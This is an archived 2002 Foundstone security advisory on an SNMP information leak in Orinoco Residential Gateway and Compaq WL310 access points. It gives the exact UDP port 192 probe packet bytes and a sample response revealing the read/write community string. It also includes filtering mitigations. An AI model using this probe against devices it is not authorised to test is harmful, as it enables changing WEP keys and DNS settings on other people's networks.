TUCoPS :: Network Appliances

TUCoPS :: Network Appliances :: napl5624.htm
Orinoco remote snmp vulnerability permits to see and change configuration
12th Aug 2002 [SBWID-5624]
COMMAND

	Orinoco  remote  snmp  vulnerability   premits   to   see   and   change
	configuration

SYSTEMS AFFECTED

	Compaq WL310 (OEM Orinoco Residential Gateway)

PROBLEM

	Per Foundstone Labs Advisory - 080902-APIL :
	

	Advisory Name: Information Leakage in Orinoco and Compaq Access Points

	 Release Date: August 9th, 2002

	  Application: Orinoco Residential Gateway and Compaq WL310

	    Platforms: N/A

	     Severity: The ability to display/modify configuration information

	      Vendors: Orinoco (http://www.orinocowireless.com) and

	                  Compaq (http://www.compaq.com)

	      Authors: Marshall Beddoe (marshall.beddoe@foundstone.com)

	                  Tony Bettini (tony.bettini@foundstone.com)

	CVE Candidate: CAN-2002-0812

	    Reference: http://www.foundstone.com/advisories

	

	Overview:
	

	An information leakage vulnerability exists in Orinoco  and  Compaq  OEM
	access points,  disclosing  the  unique  SNMP  community  string.  As  a
	result,
	

	an attacker can query the community  string  and  gain  the  ability  to
	change system configuration including  Wired  Equivalent  Privacy  (WEP)
	keys and Domain Name Service (DNS) information.
	

	Detailed Description:
	

	The Compaq WL310 is an OEM Orinoco  Residential  Gateway  access  point.
	Both the Compaq and Orinoco access points use  a  unique  identification
	number found on  the  bottom  of  the  access  point  for  configuration
	through their management client. This identification string is  used  as
	the default SNMP read/write  community  string.  The  community  strings
	appears to be unchangable, unique, and not easily guessable. By  sending
	a specific packet  to  UDP  port  192,  the  access  point  will  return
	information   including   the   firmware   version   and   the    unique
	identification  value.  The  packet  returned  includes  the  value   of
	system.sysName.0, which in the case of  the  Compaq  WL310  and  Orinoco
	Residential Gateway,  includes  the  unique  identification  value.  The
	identification value can then be used as the SNMP  community  string  to
	view and modify the configuration.
	

	The probe packet:
	

	"\x01\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

	

	Example probe response:
	

	01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................

	00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................

	00 00 00 00 00 60 1d 20 2e 38 00 00 18 19 10 f8 | .....`. .8......

	4f 52 69 4e 4f 43 4f 20 52 47 2d 31 31 30 30 20 | ORiNOCO RG-1100

	30 33 39 32 61 30 00 00 00 00 00 00 00 00 00 00 | 0392a0..........

	02 8f 24 02 52 47 2d 31 31 30 30 20 56 33 2e 38 | ..$.RG-1100 V3.8

	33 20 53 4e 2d 30 32 55 54 30 38 32 33 32 33 34 | 3 SN-02UT0823234

	32 20 56 00 | 2 V.

	

	system.sysName.0 = "ORiNOCO RG-1100 0392a0"

	Community name: 0392a0

	

	Vendor Response:
	

	Both vendors were notified of this issue on July  8th,  2002.  According
	to Orinoco, "The Residential Gateway line has been discontinued."

SOLUTION

	Solution:
	

	Employ packet filtering on inbound requests to deny access to ports

	192/udp and 161/udp on the access point.

	

	FoundScan has been updated to check for this vulnerability. For more

	information on FoundScan, see the Foundstone website:

	http://www.foundstone.com

	

	Disclaimer:

	

	The information contained in this advisory is copyright (c) 2002

	Foundstone, Inc. and is believed to be accurate at the time of

	publishing, but no representation of any warranty is given,

	express, or implied as to its accuracy or completeness. In no

	event shall the author or Foundstone be liable for any direct,

	indirect, incidental, special, exemplary or consequential

	damages resulting from the use or misuse of this information.

	This advisory may be redistributed, provided that no fee is

	assigned and that the advisory is not modified in any way. 

	

	-Also-

	

	You might consider configuring the Gateway to remove snmp alltogether ...